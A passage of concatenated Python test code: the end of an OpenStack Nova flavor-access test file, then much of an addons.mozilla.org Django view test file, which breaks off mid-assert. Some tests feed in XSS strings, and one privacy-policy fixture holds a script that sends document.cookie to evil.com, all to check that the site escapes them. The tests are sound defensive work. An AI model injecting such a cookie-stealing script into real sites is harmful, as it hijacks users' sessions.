use_admin_context=False) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_show(self): resp = FakeResponse() self.flavor_action_controller.show(self.req, resp, '0') self.assertEqual({'id': '0', 'os-flavor-access:is_public': True}, resp.obj['flavor']) self.flavor_action_controller.show(self.req, resp, '2') self.assertEqual({'id': '0', 'os-flavor-access:is_public': False}, resp.obj['flavor']) def test_detail(self): resp = FakeResponse() self.flavor_action_controller.detail(self.req, resp) self.assertEqual([{'id': '0', 'os-flavor-access:is_public': True}, {'id': '2', 'os-flavor-access:is_public': False}], resp.obj['flavors']) def test_create(self): resp = FakeResponse() self.flavor_action_controller.create(self.req, {}, resp) self.assertEqual({'id': '0', 'os-flavor-access:is_public': True}, resp.obj['flavor']) def _get_add_access(self): if self.api_version == "2.1": return self.flavor_action_controller._add_tenant_access else: return self.flavor_action_controller._addTenantAccess def _get_remove_access(self): if self.api_version == "2.1": return self.flavor_action_controller._remove_tenant_access else: return self.flavor_action_controller._removeTenantAccess @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_add_tenant_access(self, mock_api_get): def stub_add_flavor_access(context, flavorid, projectid): self.assertEqual('3', flavorid, "flavorid") self.assertEqual("proj2", projectid, "projectid") self.stub_out('nova.db.flavor_access_add', stub_add_flavor_access) expected = {'flavor_access': [{'flavor_id': '3', 'tenant_id': 'proj3'}]} body = {'addTenantAccess': {'tenant': 'proj2'}} req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action', use_admin_context=True) add_access = self._get_add_access() result = add_access(req, '3', body=body) self.assertEqual(result, expected) @mock.patch('nova.objects.Flavor.get_by_flavor_id', side_effect=exception.FlavorNotFound(flavor_id='1')) def test_add_tenant_access_with_flavor_not_found(self, mock_get): body = {'addTenantAccess': {'tenant': 'proj2'}} req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action', use_admin_context=True) add_access = self._get_add_access() self.assertRaises(exc.HTTPNotFound, add_access, req, '2', body=body) def test_add_tenant_access_with_no_tenant(self): req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action', use_admin_context=True) body = {'addTenantAccess': {'foo': 'proj2'}} add_access = self._get_add_access() self.assertRaises(self.validation_ex, add_access, req, '2', body=body) body = {'addTenantAccess': {'tenant': ''}} self.assertRaises(self.validation_ex, add_access, req, '2', body=body) @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_add_tenant_access_with_already_added_access(self, mock_api_get): def stub_add_flavor_access(context, flavorid, projectid): raise exception.FlavorAccessExists(flavor_id=flavorid, project_id=projectid) self.stub_out('nova.db.flavor_access_add', stub_add_flavor_access) body = {'addTenantAccess': {'tenant': 'proj2'}} add_access = self._get_add_access() self.assertRaises(exc.HTTPConflict, add_access, self.req, '3', body=body) @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_remove_tenant_access_with_bad_access(self, mock_api_get): def stub_remove_flavor_access(context, flavorid, projectid): raise exception.FlavorAccessNotFound(flavor_id=flavorid, project_id=projectid) self.stub_out('nova.db.flavor_access_remove', stub_remove_flavor_access) body = {'removeTenantAccess': {'tenant': 'proj2'}} remove_access = self._get_remove_access() self.assertRaises(exc.HTTPNotFound, remove_access, self.req, '3', body=body) @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_add_tenant_access_is_public(self, mock_api_get): body = {'addTenantAccess': {'tenant': 'proj2'}} req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action', use_admin_context=True) req.api_version_request = api_version.APIVersionRequest('2.7') add_access = self._get_add_access() self.assertRaises(exc.HTTPConflict, add_access, req, '1', body=body) @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_delete_tenant_access_with_no_tenant(self, mock_api_get): req = fakes.HTTPRequest.blank(self._prefix + '/flavors/2/action', use_admin_context=True) remove_access = self._get_remove_access() body = {'removeTenantAccess': {'foo': 'proj2'}} self.assertRaises(self.validation_ex, remove_access, req, '2', body=body) body = {'removeTenantAccess': {'tenant': ''}} self.assertRaises(self.validation_ex, remove_access, req, '2', body=body) class FlavorAccessPolicyEnforcementV21(test.NoDBTestCase): def setUp(self): super(FlavorAccessPolicyEnforcementV21, self).setUp() self.act_controller = flavor_access_v21.FlavorActionController() self.access_controller = flavor_access_v21.FlavorAccessController() self.req = fakes.HTTPRequest.blank('') def test_add_tenant_access_policy_failed(self): rule_name = "os_compute_api:os-flavor-access:add_tenant_access" self.policy.set_rules({rule_name: "project:non_fake"}) exc = self.assertRaises( exception.PolicyNotAuthorized, self.act_controller._add_tenant_access, self.req, fakes.FAKE_UUID, body={'addTenantAccess': {'tenant': fakes.FAKE_UUID}}) self.assertEqual( "Policy doesn't allow %s to be performed." % rule_name, exc.format_message()) def test_remove_tenant_access_policy_failed(self): rule_name = ("os_compute_api:os-flavor-access:" "remove_tenant_access") self.policy.set_rules({rule_name: "project:non_fake"}) exc = self.assertRaises( exception.PolicyNotAuthorized, self.act_controller._remove_tenant_access, self.req, fakes.FAKE_UUID, body={'removeTenantAccess': {'tenant': fakes.FAKE_UUID}}) self.assertEqual( "Policy doesn't allow %s to be performed." % rule_name, exc.format_message()) def test_extend_create_policy_failed(self): rule_name = "os_compute_api:os-flavor-access" self.policy.set_rules({rule_name: "project:non_fake"}) self.act_controller.create(self.req, None, None) def test_extend_show_policy_failed(self): rule_name = "os_compute_api:os-flavor-access" self.policy.set_rules({rule_name: "project:non_fake"}) self.act_controller.show(self.req, None, None) def test_extend_detail_policy_failed(self): rule_name = "os_compute_api:os-flavor-access" self.policy.set_rules({rule_name: "project:non_fake"}) self.act_controller.detail(self.req, None) def test_index_policy_failed(self): rule_name = "os_compute_api:os-flavor-access" self.policy.set_rules({rule_name: "project:non_fake"}) exc = self.assertRaises( exception.PolicyNotAuthorized, self.access_controller.index, self.req, fakes.FAKE_UUID) self.assertEqual( "Policy doesn't allow %s to be performed." % rule_name, exc.format_message())
vmturbo/nova
nova/tests/unit/api/openstack/compute/test_flavor_access.py
Python
apache-2.0
19,273
# -*- coding: utf-8 -*- import json import random import re import os from django.conf import settings from django.core import mail from django.core.cache import cache from django.test.utils import override_settings from django.test.client import Client from django.utils.http import urlunquote import mock import pytest import waffle from elasticsearch import Elasticsearch from mock import patch from pyquery import PyQuery as pq from waffle.testutils import override_switch from rest_framework.test import APIRequestFactory from olympia import amo from olympia.abuse.models import AbuseReport from olympia.addons.models import ( Addon, AddonDependency, AddonFeatureCompatibility, AddonUser, Category, CompatOverride, CompatOverrideRange, Persona, ReplacementAddon, AddonCategory) from olympia.addons.utils import generate_addon_guid from olympia.addons.views import ( DEFAULT_FIND_REPLACEMENT_PATH, FIND_REPLACEMENT_SRC, AddonAutoCompleteSearchView, AddonSearchView) from olympia.amo.templatetags.jinja_helpers import numberfmt, urlparams from olympia.amo.tests import ( APITestClient, ESTestCase, TestCase, addon_factory, collection_factory, reverse_ns, user_factory, version_factory) from olympia.amo.urlresolvers import get_outgoing_url, reverse from olympia.bandwagon.models import Collection, FeaturedCollection from olympia.constants.categories import CATEGORIES, CATEGORIES_BY_ID from olympia.constants.licenses import LICENSES_BY_BUILTIN from olympia.files.models import WebextPermission, WebextPermissionDescription from olympia.ratings.models import Rating from olympia.users.models import UserProfile from olympia.users.templatetags.jinja_helpers import users_list from olympia.versions.models import ( ApplicationsVersions, AppVersion, Version, VersionPreview) def norm(s): """Normalize a string so that whitespace is uniform and remove whitespace between tags.""" s = re.sub(r'\s+', ' ', str(s)).strip() return re.sub(r'>\s+<', '><', s) def add_addon_author(original, copy): """Make both add-ons share an author.""" author = original.listed_authors[0] AddonUser.objects.create(addon=copy, user=author, listed=True) return author def check_cat_sidebar(url, addon): """Ensures that the sidebar shows the categories for the correct type.""" cache.clear() for type_ in [amo.ADDON_EXTENSION, amo.ADDON_THEME, amo.ADDON_SEARCH]: addon.update(type=type_) r = Client().get(url) assert pq(r.content)('#side-nav').attr('data-addontype') == str(type_) def _test_hovercards(self, doc, addons, src=''): addons = list(addons) assert doc.find('.addon.hovercard').length == len(addons) for addon in addons: btn = doc.find('.install[data-addon="%s"]' % addon.id) assert btn.length == 1 hc = btn.parents('.addon.hovercard') assert hc.find('a').attr('href') == ( urlparams(addon.get_url_path(), src=src)) assert hc.find('h3').text() == unicode(addon.name) class TestHomepage(TestCase): def setUp(self): super(TestHomepage, self).setUp() self.base_url = reverse('home') def test_304(self): self.url = '/en-US/firefox/' response = self.client.get(self.url) assert 'ETag' in response response = self.client.get(self.url, HTTP_IF_NONE_MATCH=response['ETag']) assert response.status_code == 304 assert not response.content response = self.client.get(self.url, HTTP_IF_NONE_MATCH='random_etag_string') assert response.status_code == 200 assert response.content def test_thunderbird(self): """Thunderbird homepage should have the Thunderbird title.""" r = self.client.get('/en-US/thunderbird/') doc = pq(r.content) assert 'Add-ons for Thunderbird' == doc('title').text() def test_welcome_msg(self): r = self.client.get('/en-US/firefox/') welcome = pq(r.content)('#site-welcome').remove('a.close') assert welcome.text() == ( 'Welcome to Firefox Add-ons.\nChoose from thousands of extra ' 'features and styles to make Firefox your own.') r = self.client.get('/en-US/thunderbird/') welcome = pq(r.content)('#site-welcome').remove('a.close') assert welcome.text() == ( 'Welcome to Thunderbird Add-ons.\nAdd extra features and styles ' 'to make Thunderbird your own.') def test_try_new_frontend_banner_presence(self): self.url = '/en-US/firefox/' response = self.client.get(self.url) assert 'AMO is getting a new look.' not in response.content with override_switch('try-new-frontend', active=True): response = self.client.get(self.url) assert 'AMO is getting a new look.' in response.content class TestHomepageFeatures(TestCase): fixtures = ['base/appversion', 'base/users', 'base/addon_3615', 'base/collections', 'base/global-stats', 'base/featured', 'addons/featured', 'bandwagon/featured_collections'] def setUp(self): super(TestHomepageFeatures, self).setUp() self.url = reverse('home') def test_no_unreviewed(self): response = self.client.get(self.url) addon_lists = 'popular featured hotness personas'.split() for key in addon_lists: for addon in response.context[key]: assert addon.status != amo.STATUS_NOMINATED def test_seeall(self): Collection.objects.update(type=amo.COLLECTION_FEATURED) doc = pq(self.client.get(self.url).content) browse_extensions = reverse('browse.extensions') browse_personas = reverse('browse.personas') browse_collections = reverse('collections.list') sections = { '#popular-extensions': browse_extensions + '?sort=users', '#featured-extensions': browse_extensions + '?sort=featured', '#upandcoming': browse_extensions + '?sort=hotness', '#featured-themes': browse_personas, '#featured-collections': browse_collections + '?sort=featured', } for id_, url in sections.iteritems(): # Check that the "See All" link points to the correct page. assert doc.find('%s .seeall' % id_).attr('href') == url class TestOldContributionRedirects(TestCase): fixtures = ['base/appversion', 'base/addon_592'] def setUp(self): self.detail_url = reverse('addons.detail', args=['a592']) def test_installed(self): url = reverse('addons.installed', args=['a592']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) def test_contribute(self): url = reverse('addons.contribute', args=['a592']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) def test_contribute_status(self): url = reverse('addons.contribute_status', args=['a592', 'complete']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) url = reverse('addons.contribute_status', args=['a592', 'cancel']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) def test_meet(self): url = reverse('addons.meet', args=['a592']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) def test_thanks(self): url = reverse('addons.thanks', args=['a592']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) def test_roadblock(self): url = reverse('addons.roadblock', args=['a592']) response = self.client.get(url, follow=True) self.assert3xx(response, self.detail_url, 301) class TestContributionsURL(TestCase): fixtures = ['base/addon_3615', 'base/addon_592', 'base/users', 'addons/eula+contrib-addon', 'addons/addon_228106_info+dev+bio.json', 'addons/addon_228107_multiple-devs.json'] def setUp(self): self.addon = Addon.objects.get(pk=592) user = UserProfile.objects.get(pk=999) AddonUser(addon=self.addon, user=user).save() def test_button_appears_if_set(self): response = self.client.get(self.addon.get_url_path()) # No button by default because Addon.contributions url not set. assert pq(response.content)('#contribution-url-button').length == 0 # Set it and it appears though. self.addon.update(contributions='https://paypal.me/foooo') response = self.client.get(self.addon.get_url_path() ) button = pq(response.content)('#contribution-url-button') assert button.length == 1, response.content assert button[0].attrib['href'] == get_outgoing_url( 'https://paypal.me/foooo') class TestLicensePage(TestCase): fixtures = ['base/addon_3615'] def setUp(self): super(TestLicensePage, self).setUp() self.addon = Addon.objects.get(id=3615) self.version = self.addon.current_version def test_legacy_redirect(self): response = self.client.get( '/en-US/firefox/versions/license/%s' % self.version.id, follow=True) self.assert3xx(response, self.version.license_url(), 301) def test_legacy_redirect_deleted(self): self.version.delete() response = self.client.get( '/en-US/firefox/versions/license/%s' % self.version.id) assert response.status_code == 404 def test_explicit_version(self): url = reverse('addons.license', args=['a3615', self.version.version]) r = self.client.get(url) assert r.status_code == 200 assert r.context['version'] == self.version def test_implicit_version(self): url = reverse('addons.license', args=['a3615']) r = self.client.get(url) assert r.status_code == 200 assert r.context['version'] == self.addon.current_version def test_no_license(self): self.version.update(license=None) url = reverse('addons.license', args=['a3615']) r = self.client.get(url) assert r.status_code == 404 def test_no_version(self): self.addon.versions.all().delete() url = reverse('addons.license', args=['a3615']) r = self.client.get(url) assert r.status_code == 404 def test_unlisted_version(self): self.version.update(channel=amo.RELEASE_CHANNEL_UNLISTED) assert self.version.license url = reverse('addons.license', args=['a3615']) r = self.client.get(url) assert r.status_code == 404 def test_duplicate_version_number(self): Version.objects.create(addon=self.addon, version=self.version.version) url = reverse('addons.license', args=['a3615', self.version.version]) r = self.client.get(url) assert r.status_code == 200 assert r.context['version'] == self.addon.current_version def test_cat_sidebar(self): check_cat_sidebar(reverse('addons.license', args=['a3615']), self.addon) class TestICloudRedirect(TestCase): def setUp(self): addon_factory(slug='icloud-bookmarks') @override_switch('icloud_bookmarks_redirect', active=True) def test_redirect_with_waffle(self): r = self.client.get('/en-US/firefox/addon/icloud-bookmarks/') assert r.status_code == 302 assert r.get('location') == '%s/blocked/i1214/' % settings.SITE_URL @override_switch('icloud_bookmarks_redirect', active=False) def test_redirect_without_waffle(self): r = self.client.get('/en-US/firefox/addon/icloud-bookmarks/') assert r.status_code == 200 assert r.context['addon'] is not None class TestDetailPage(TestCase): fixtures = ['base/addon_3615', 'base/users', 'base/addon_59', 'base/addon_592', 'base/addon_4594_a9', 'addons/listed', 'addons/persona'] def setUp(self): super(TestDetailPage, self).setUp() self.addon = Addon.objects.get(id=3615) self.url = self.addon.get_url_path() self.more_url = self.addon.get_url_path(more=True) def test_try_new_frontend_banner_presence(self): response = self.client.get(self.url) assert 'AMO is getting a new look.' not in response.content with override_switch('try-new-frontend', active=True): response = self.client.get(self.url) assert 'AMO is getting a new look.' in response.content def test_304(self): response = self.client.get(self.url) assert 'ETag' in response response = self.client.get(self.url, HTTP_IF_NONE_MATCH=response['ETag']) assert response.status_code == 304 assert not response.content response = self.client.get(self.url, HTTP_IF_NONE_MATCH='random_etag_string') assert response.status_code == 200 assert response.content def test_site_title(self): r = self.client.get(self.url) assert pq(r.content)('h1.site-title').text() == 'Add-ons' def test_addon_headings(self): r = self.client.get(self.url) doc = pq(r.content) assert doc('h2:first').text() == 'About this Add-on' assert doc('.metadata .home').text() == 'Add-on home page' def test_anonymous_extension(self): response = self.client.get(self.url) assert response.status_code == 200 assert response.context['addon'].id == 3615 def test_anonymous_persona(self): response = self.client.get(reverse('addons.detail', args=['a15663'])) assert response.status_code == 200 assert response.context['addon'].id == 15663 def test_review_microdata_personas(self): a = Addon.objects.get(id=15663) a.name = '<script>alert("fff")</script>' a.save() response = self.client.get(reverse('addons.detail', args=['a15663'])) assert ( '&lt;script&gt;alert(&quot;fff&quot;)&lt;/script&gt;' in response.content) assert '<script>' not in response.content def test_report_abuse_links_to_form_age(self): response = self.client.get_ajax( reverse('addons.detail', args=['a3615'])) doc = pq(response.content) expected = reverse('addons.abuse', args=['3615']) assert doc('#report-abuse').attr('href') == expected def test_personas_context(self): response = self.client.get(reverse('addons.detail', args=['a15663'])) assert 'review_form' in response.context assert 'reviews' in response.context assert 'get_replies' in response.context def test_unreviewed_robots(self): """Check that unreviewed add-ons do not get indexed.""" url = self.addon.get_url_path() m = 'meta[content=noindex]' assert self.addon.status == amo.STATUS_PUBLIC settings.ENGAGE_ROBOTS = True doc = pq(self.client.get(url).content) assert not doc(m) settings.ENGAGE_ROBOTS = False doc = pq(self.client.get(url).content) assert doc(m) self.addon.update(status=amo.STATUS_NOMINATED) settings.ENGAGE_ROBOTS = False doc = pq(self.client.get(url).content) assert doc(m) settings.ENGAGE_ROBOTS = True doc = pq(self.client.get(url).content) assert doc(m) def test_more_about(self): # Don't show more about box if there's nothing to populate it. self.addon.developer_comments_id = None self.addon.description_id = None self.addon.previews.all().delete() self.addon.save() r = self.client.get(self.url) doc = pq(r.content) assert doc('#more-about').length == 0 assert doc('.article.userinput').length == 0 def test_type_redirect(self): """ If current add-on's type is unsupported by app, redirect to an app that supports it. """ # Thunderbird can't do search engines prefixer = amo.urlresolvers.get_url_prefix() prefixer.app = amo.THUNDERBIRD.short response = self.client.get(reverse('addons.detail', args=['a4594']), follow=False) assert response.status_code == 301 assert response['Location'].find(amo.THUNDERBIRD.short) == -1 assert (response['Location'].find(amo.FIREFOX.short) >= 0) def test_compatible_app_redirect(self): """ For add-ons incompatible with the current app, redirect to one that's supported. """ comp_app = self.addon.compatible_apps.keys()[0] not_comp_app = [a for a in amo.APP_USAGE if a not in self.addon.compatible_apps.keys()][0] # no SeaMonkey version => redirect prefixer = amo.urlresolvers.get_url_prefix() prefixer.app = not_comp_app.short r = self.client.get(reverse('addons.detail', args=[self.addon.slug])) assert r.status_code == 301 assert r['Location'].find(not_comp_app.short) == -1 assert r['Location'].find(comp_app.short) >= 0 # compatible app => 200 prefixer = amo.urlresolvers.get_url_prefix() prefixer.app = comp_app.short r = self.client.get(reverse('addons.detail', args=[self.addon.slug])) assert r.status_code == 200 def test_external_urls(self): """Check that external URLs are properly escaped.""" response = self.client.get(self.url) doc = pq(response.content) assert doc( 'aside a.home[href^="%s"]' % settings.REDIRECT_URL).length == 1 def test_no_privacy_policy(self): """Make sure privacy policy is not shown when not present.""" self.addon.privacy_policy_id = None self.addon.save() response = self.client.get(self.url) doc = pq(response.content) assert doc('.privacy-policy').length == 0 def test_privacy_policy(self): self.addon.privacy_policy = 'foo bar' self.addon.save() response = self.client.get(self.url) doc = pq(response.content) assert doc('.privacy-policy').length == 1 privacy_url = reverse('addons.privacy', args=[self.addon.slug]) assert doc('.privacy-policy').attr('href').endswith(privacy_url) def test_permissions_webext(self): file_ = self.addon.current_version.all_files[0] file_.update(is_webextension=True) WebextPermission.objects.create(file=file_, permissions=[ u'http://*/*', u'<all_urls>', u'bookmarks', u'nativeMessaging', u'made up permission']) WebextPermissionDescription.objects.create( name=u'bookmarks', description=u'Read and modify bookmarks') WebextPermissionDescription.objects.create( name=u'nativeMessaging', description=u'Exchange messages with programs other than Firefox') response = self.client.get(self.url) doc = pq(response.content) # The link next to the button assert doc('a.webext-permissions').length == 1 # And the model dialog assert doc('#webext-permissions').length == 1 assert u'perform certain functions (example: a tab management' in ( doc('#webext-permissions div.prose').text()) assert doc('ul.webext-permissions-list').length == 1 assert doc('li.webext-permissions-list').length == 3 # See File.webext_permissions for the order logic assert doc('li.webext-permissions-list').text() == ( u'Access your data for all websites ' u'Exchange messages with programs other than Firefox ' u'Read and modify bookmarks') def test_permissions_webext_no_permissions(self): file_ = self.addon.current_version.all_files[0] file_.update(is_webextension=True) assert file_.webext_permissions_list == [] response = self.client.get(self.url) doc = pq(response.content) # Don't show the link when no permissions. assert doc('a.webext-permissions').length == 0 # And no model dialog assert doc('#webext-permissions').length == 0 def test_permissions_non_webext(self): file_ = self.addon.current_version.all_files[0] file_.update(is_webextension=False) response = self.client.get(self.url) doc = pq(response.content) # The link next to the button assert doc('a.webext-permissions').length == 1 # danger danger icon shown for oldie xul addons assert doc('a.webext-permissions img').length == 1 # And the model dialog assert doc('#webext-permissions').length == 1 assert u'Please note this add-on uses legacy technology' in ( doc('#webext-permissions div.prose').text()) assert doc('.webext-permissions-list').length == 0 def test_permissions_non_extension(self): self.addon.update(type=amo.ADDON_THEME) file_ = self.addon.current_version.all_files[0] assert not file_.is_webextension response = self.client.get(self.url) doc = pq(response.content) # Don't show the link for non-extensions assert doc('a.webext-permissions').length == 0 # And no model dialog assert doc('#webext-permissions').length == 0 def test_permissions_xss_single_url(self): file_ = self.addon.current_version.all_files[0] file_.update(is_webextension=True) WebextPermission.objects.create(file=file_, permissions=[ u'<script>alert("//")</script>']) response = self.client.get(self.url) doc = pq(response.content) assert doc('li.webext-permissions-list').text() == ( u'Access your data for ' u'<script>alert("//")</script>') assert '<script>alert(' not in response.content assert '&lt;script&gt;alert(' in response.content def test_permissions_xss_multiple_url(self): file_ = self.addon.current_version.all_files[0] file_.update(is_webextension=True) WebextPermission.objects.create(file=file_, permissions=[ '<script>alert("//")</script>', '<script>foo("https://")</script>']) response = self.client.get(self.url) doc = pq(response.content) assert doc('li.webext-permissions-list').text() == ( u'Access your data on the following websites:\n' u'<script>alert("//")</script>\n' u'<script>foo("https://")</script>') assert '<script>alert(' not in response.content assert '<script>foo(' not in response.content assert '&lt;script&gt;alert(' in response.content assert '&lt;script&gt;foo(' in response.content def test_simple_html_is_rendered_in_privacy(self): self.addon.privacy_policy = """ <strong> what the hell..</strong> <ul> <li>papparapara</li> <li>todotodotodo</li> </ul> <ol> <a href="irc://irc.mozilla.org/firefox">firefox</a> Introduce yourself to the community, if you like! This text will appear publicly on your user info page. <li>papparapara2</li> <li>todotodotodo2</li> </ol> """ self.addon.save() r = self.client.get(reverse('addons.privacy', args=[self.addon.slug])) doc = pq(r.content) assert norm(doc(".policy-statement strong")) == ( "<strong> what the hell..</strong>") assert norm(doc(".policy-statement ul")) == ( "<ul><li>papparapara</li><li>todotodotodo</li></ul>") assert doc(".policy-statement ol a").text() == ( "firefox") assert norm(doc(".policy-statement ol li:first")) == ( "<li>papparapara2</li>") def test_evil_html_is_not_rendered_in_privacy(self): self.addon.privacy_policy = """ <script type="text/javascript"> window.location = 'http://evil.com/?c=' + document.cookie; </script> Muhuhahahahahahaha! """ self.addon.save() r = self.client.get(reverse('addons.privacy', args=[self.addon.slug])) doc = pq(r.content) policy = str(doc(".policy-statement")) assert policy.startswith( '<div class="policy-statement">&lt;script'), ( 'Unexpected: %s' % policy[0:50]) def test_button_size(self): """Make sure install buttons on the detail page are prominent.""" response = self.client.get(reverse('addons.detail', args=['a3615']), follow=True) assert pq(response.content)('.button').hasClass('prominent') def test_button_src_default(self): r = self.client.get(self.url, follow=True) assert (pq(r.content)('#addon .button').attr( 'href').endswith('?src=dp-btn-primary')) def test_button_src_trickle(self): r = self.client.get(self.url + '?src=trickleortreat', follow=True) assert (pq(r.content)('#addon .button').attr( 'href').endswith('?src=trickleortreat')) def test_version_button_src_default(self): r = self.client.get(self.url, follow=True) assert (pq(r.content)('#detail-relnotes .button').attr( 'href').endswith('?src=dp-btn-version')) def test_version_button_src_trickle(self): r = self.client.get(self.url + '?src=trickleortreat', follow=True) assert (pq(r.content)('#detail-relnotes .button').attr( 'href').endswith('?src=trickleortreat')) def test_version_more_link(self): doc = pq(self.client.get(self.url).content) versions_url = reverse('addons.versions', args=[self.addon.slug]) assert (doc('#detail-relnotes a.more-info').attr('href') == versions_url) def test_invalid_version(self): """Only render details pages for add-ons that have a version.""" # Wipe all versions. self.addon.versions.all().delete() # Try accessing the details page. response = self.client.get(self.url) assert response.status_code == 404 def test_no_listed_authors(self): r = self.client.get(reverse('addons.detail', args=['a59'])) # We shouldn't show an avatar since this has no listed_authors. doc = pq(r.content) assert 0 == len(doc('.avatar')) def test_authors_xss(self): name = '<script>alert(1)</script>' user = UserProfile.objects.create(username='test', display_name=name) output = users_list([user]) assert "&lt;script&gt;alert" in output assert "<script>alert" not in output def test_display_compatible_apps(self): """ Show compatibility info for extensions but not for search engines. """ r = self.client.get(self.addon.get_url_path()) assert pq(r.content)('#detail-relnotes .compat').length == 1 a = Addon.objects.filter(type=amo.ADDON_SEARCH)[0] r = self.client.get(a.get_url_path()) assert pq(r.content)('#detail-relnotes .compat').length == 0 def test_is_restart_required(self): span_is_restart_required = ( '<span class="is-restart-required">Requires Restart</span>') file_ = self.addon.current_version.all_files[0] assert file_.is_restart_required is False response = self.client.get(self.url) assert span_is_restart_required not in response.content file_.update(is_restart_required=True) response = self.client.get(self.url) assert span_is_restart_required in response.content def test_fx57_label_is_webextension(self): """Test that the Firefox 57 label is being shown. That label depends on `is_webextension` being set or if the add-on is a mozilla internally signed add-on. """ file_ = self.addon.current_version.all_files[0] assert file_.is_webextension is False response = self.client.get(self.url) doc = pq(response.content) assert not doc('a.is-webextension') file_.update(is_webextension=True, is_restart_required=False) assert file_.is_webextension is True response = self.client.get(self.url) doc = pq(response.content) link = doc('a.is-webextension') assert ( link.attr['href'] == 'https://support.mozilla.org/kb/firefox-add-technology-modernizing' ) def test_fx57_label_is_mozilla_signed_extension(self): """Test that the Firefox 57 label is being shown. That label depends on `is_webextension` being set or if the add-on is a mozilla internally signed add-on. """ file_ = self.addon.current_version.all_files[0] assert file_.is_mozilla_signed_extension is False response = self.client.get(self.url) doc = pq(response.content) assert not doc('a.is-webextension') file_.update(is_mozilla_signed_extension=True) assert file_.is_mozilla_signed_extension is True response = self.client.get(self.url) doc = pq(response.content) link = doc('a.is-webextension') assert ( link.attr['href'] == 'https://support.mozilla.org/kb/firefox-add-technology-modernizing' ) def test_version_displayed(self): response = self.client.get(self.url) doc = pq(response.content) assert doc('.version-number').text() == '2.1.072' def test_disabled_user_message(self): self.addon.update(disabled_by_user=True) res = self.client.get(self.url) assert res.status_code == 404 assert 'removed by its author' in res.content def test_disabled_status_message(self): self.addon.update(status=amo.STATUS_DISABLED) res = self.client.get(self.url) assert res.status_code == 404 assert 'disabled by an administrator' in res.content def test_deleted_status_message(self): addon = Addon.objects.get(id=3615) addon.update(status=amo.STATUS_DELETED) url = reverse('addons.detail', args=[addon.slug]) res = self.client.get(url) assert res.status_code == 404 def test_more_url(self): response = self.client.get(self.url) assert pq(response.content)('#more-webpage').attr('data-more-url') == ( self.addon.get_url_path(more=True)) def test_unlisted_addon_returns_404(self): """Unlisted addons are not listed and return 404.""" self.make_addon_unlisted(self.addon) assert self.client.get(self.url).status_code == 404 def test_admin_buttons(self): def get_detail(): return self.client.get(reverse('addons.detail', args=['a3615']), follow=True) # No login, no buttons. assert pq(get_detail().content)('.manage-button').length == 0 # No developer, no buttons. self.client.login(email='regular@mozilla.com') assert pq(get_detail().content)('.manage-button').length == 0 # developer gets a 'Manage' button to devhub self.client.login(email='del@icio.us') content = get_detail().content assert pq(content)('.manage-button').length == 1 assert pq(content)('.manage-button a').eq(0).attr('href') == ( self.addon.get_dev_url()) # reviewer gets an 'Add-on Review' button self.client.login(email='reviewer@mozilla.com') content = get_detail().content assert pq(content)('.manage-button').length == 1 assert pq(content)('.manage-button a').eq(0).attr('href') == ( reverse('reviewers.review', args=[self.addon.slug])) # admins gets devhub, 'Add-on Review' and 'Admin Manage' button too self.client.login(email='admin@mozilla.com') content = get_detail().content assert pq(content)('.manage-button').length == 3 assert pq(content)('.manage-button a').eq(0).attr('href') == ( self.addon.get_dev_url()) assert pq(content)('.manage-button a').eq(1).attr('href') == ( reverse('reviewers.review', args=[self.addon.slug])) assert pq(content)('.manage-button a').eq(2).attr('href') == ( reverse('zadmin.addon_manage', args=[self.addon.slug])) def test_reviews(self): def create_review(body='review text'): return Rating.objects.create( addon=self.addon, user=user_factory(), rating=random.randrange(0, 6), body=body) url = reverse('addons.detail', args=['a3615']) create_review() response = self.client.get(url, follow=True) assert len(response.context['reviews']) == 1 # Add a new review but with no body - shouldn't be shown on detail page create_review(body=None) response = self.client.get(url, follow=True) assert len(response.context['reviews']) == 1 # Test one last time in case caching create_review() response = self.client.get(url, follow=True) assert len(response.context['reviews']) == 2 def get_pq(self): return pq(self.client.get(self.url).content) def test_adu_stats_private(self): assert not self.addon.public_stats adu = self.get_pq()('#daily-users') assert adu.length == 1 assert adu.find('a').length == 0 def test_adu_stats_public(self): self.addon.update(public_stats=True) assert self.addon.show_adu() adu = self.get_pq()('#daily-users') # Check that ADU does link to public statistics dashboard. assert adu.find('a').attr('href') == ( reverse('stats.overview', args=[self.addon.slug])) # Check formatted count. assert adu.text().split()[0] == numberfmt( self.addon.average_daily_users) # Check if we hide link when there are no ADU. self.addon.update(average_daily_users=0) assert self.get_pq()('#daily-users').length == 0 def test_adu_stats_regular(self): self.client.login(email='regular@mozilla.com') # Should not be a link to statistics dashboard for regular users. adu = self.get_pq()('#daily-users') assert adu.length == 1 assert adu.find('a').length == 0 def test_adu_stats_admin(self): self.client.login(email='del@icio.us') # Check link to statistics dashboard for add-on authors. assert self.get_pq()('#daily-users a.stats').attr('href') == ( reverse('stats.overview', args=[self.addon.slug])) def test_downloads_stats_private(self): self.addon.update(type=amo.ADDON_SEARCH) assert not self.addon.public_stats adu = self.get_pq()('#weekly-downloads') assert adu.length == 1 assert adu.find('a').length == 0 def test_downloads_stats_public(self): self.addon.update(public_stats=True, type=amo.ADDON_SEARCH) assert not self.addon.show_adu() dls = self.get_pq()('#weekly-downloads') # Check that weekly downloads links to statistics dashboard. assert dls.find('a').attr('href') == ( reverse('stats.overview', args=[self.addon.slug])) # Check formatted count. assert dls.text().split()[0] == 